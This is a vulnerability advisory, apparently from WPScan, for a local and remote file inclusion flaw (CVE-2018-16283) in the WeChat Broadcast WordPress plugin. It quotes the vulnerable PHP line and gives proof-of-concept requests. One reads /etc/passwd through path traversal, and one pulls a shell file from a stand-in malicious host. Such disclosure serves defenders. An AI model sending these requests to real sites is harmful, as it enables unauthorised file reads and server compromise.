Wechat Broadcast <= 1.2.0 - Local/Remote File Inclusion

Description

This bug was found in the file:

/wechat-broadcast/wechat/Image.php

echo file_get_contents(isset($_GET["url"]) ? $_GET["url"] : '');

The parameter "url" it is not sanitized allowing include local or remote
files

To exploit the vulnerability only is needed use the version 1.0 of the HTTP
protocol to interact with the application.

Proof of Concept

Local File Inclusion POC:

GET
/wordpress/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd

Remote File Inclusion POC:

GET /wordpress/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=
http://malicious.url/shell.txt

Affects Plugin

wechat-broadcast

no known fix

- plugin closed

References

CVE	2018-16283
ExploitDB	45438
URL	https://seclists.org/fulldisclosure/2018/Sep/32

Classification

Type	LFI
OWASP Top 10	A1: Injection
CWE	CWE-22

Miscellaneous

Original Researcher	Manuel García Cárdenas
Submitter	Jonas Lejon
Submitter Website	https://wpscans.com
Submitter Twitter	@wpscans
Views	9066
Verified	No
WPVDB ID	9132

Timeline

Publicly Published	2018-09-19 (almost 2 years ago)
Added	2018-09-24 (almost 2 years ago)
Last Updated	2019-11-01 (8 months ago)

Our Other Services

Online WordPress Vulnerability Scanner

WPScan WordPress Security Plugin